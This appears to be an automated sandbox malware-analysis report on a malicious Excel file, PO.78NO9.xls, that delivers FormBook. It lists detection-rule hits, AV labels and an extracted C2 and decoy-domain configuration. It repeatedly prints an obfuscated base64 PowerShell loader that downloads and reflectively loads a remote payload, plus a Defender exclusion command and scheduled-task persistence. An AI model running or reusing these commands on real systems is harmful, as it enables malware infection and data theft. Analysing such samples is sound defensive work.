'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjR
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, ParentProcessId: 2452, ParentProcessName: aspnet_regbrowsers.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe", ProcessId: 2980, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3524, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS" , ProcessId: 3316, ProcessName: wscript.exe
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3524, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS" , ProcessId: 3316, ProcessName: wscript.exe
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0
      Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.194.50.211, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3524, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, ParentProcessId: 2452, ParentProcessName: aspnet_regbrowsers.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe", ProcessId: 2980, ProcessName: powershell.exe
      Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3524, Protocol: tcp, SourceIp: 14.194.50.211, SourceIsIpv6: false, SourcePort: 443
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, ParentProcessId: 2452, ParentProcessName: aspnet_regbrowsers.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp", ProcessId: 3328, ProcessName: schtasks.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3524, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS" , ProcessId: 3316, ProcessName: wscript.exe
      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3524, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0
      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3792, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2660, TargetFilename: C:\Users\user\AppData\Local\Temp\sxzt305u.qfk.ps1

      Persistence and Installation Behavior

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, ParentProcessId: 2452, ParentProcessName: aspnet_regbrowsers.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp", ProcessId: 3328, ProcessName: schtasks.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{71025B50-9EA6-4B02-92C0-2B9E7555DC6C}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
      Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lefeetlab.net/gwdv/"], "decoy": ["boyxlife.cyou", "v9.delivery", "intelliflow.run", "gstech.cloud", "qzbqtu.cyou", "splunk-test.dev", "nasocnite.xyz", "outdooradventuregearhub511.shop", "uptobisone.website", "andyouwannafuck.cloud", "blancslatespeedshop.com", "technical.cash", "highercall.net", "incronizid.dev", "tzx9y.rest", "brakpanbrand.net", "stimna.love", "thefarmerzpizza.info", "full4d.net", "lingerie-16071.bond", "ouc24.buzz", "spanish-classes-13883.bond", "slhub.xyz", "redcampgear.shop", "prefabricated-homes-48151.bond", "senior-dating-73474.bond", "betnirmala.pro", "xdns.dev", "nvpvr.info", "my-tournament.live", "20040523.xyz", "tb4r.net", "papayan.xyz", "longbeibusiness.life", "workweek.world", "besuperclinic.com", "online-dating-68375.bond", "yourdentalcare.shop", "seo7x.digital", "back-pain-treatment-11921.bond", "hme8h3f.shop", "cip138max.site", "bet-flix.live", "lmodt.info", "m-tb-zy.shop", "ylu8g260nq.cyou", "victorygameconsiderations.homes", "accountingcourse06.shop", "blackwavetattoostudio.com", "divineworks.store", "momomooncakes.net", "kemari.click", "3rhis.shop", "familyswim.xyz", "pp557.vip", "3dnu3uix.college", "massage-courses-infinity.sbs", "jandjacres.net", "dental-implants-84866.bond", "mahjowefvvcne.space", "inkalternatif188bet.net", "birthinjurylawyers825880.online", "yycvoc.sbs", "mdnews.tech"]}
      Source: PO.78NO9.xlsVirustotal: Detection: 16%Perma Link
      Source: Yara matchFile source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: PO.78NO9.xlsJoe Sandbox ML: detected
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_009340B9 CryptDecodeObject,LocalAlloc,CryptDecodeObject,LocalFree,GetLastError,27_2_009340B9
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_009279B8 CryptMsgOpenToDecode,GetLastError,GetLastError,GetLastError,CryptMsgUpdate,GetLastError,GetLastError,GetLastError,CertOpenStore,CryptMsgClose,27_2_009279B8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_009269BE memset,CryptSignMessage,CryptSignMessage,GetLastError,GetLastError,GetLastError,LocalAlloc,CryptSignMessage,GetLastError,GetLastError,GetLastError,LocalFree,CertFreeCertificateChain,27_2_009269BE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_00927135 CryptVerifyDetachedMessageSignature,GetLastError,GetLastError,GetLastError,GetLastError,CertFreeCertificateContext,CertFreeCertificateChain,CertCloseStore,27_2_00927135
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_00933AD1 CryptProtectData,LocalAlloc,memcpy,LocalFree,27_2_00933AD1
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0091D3DF CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,27_2_0091D3DF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_00933C77 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,27_2_00933C77
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_00933DD8 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,27_2_00933DD8
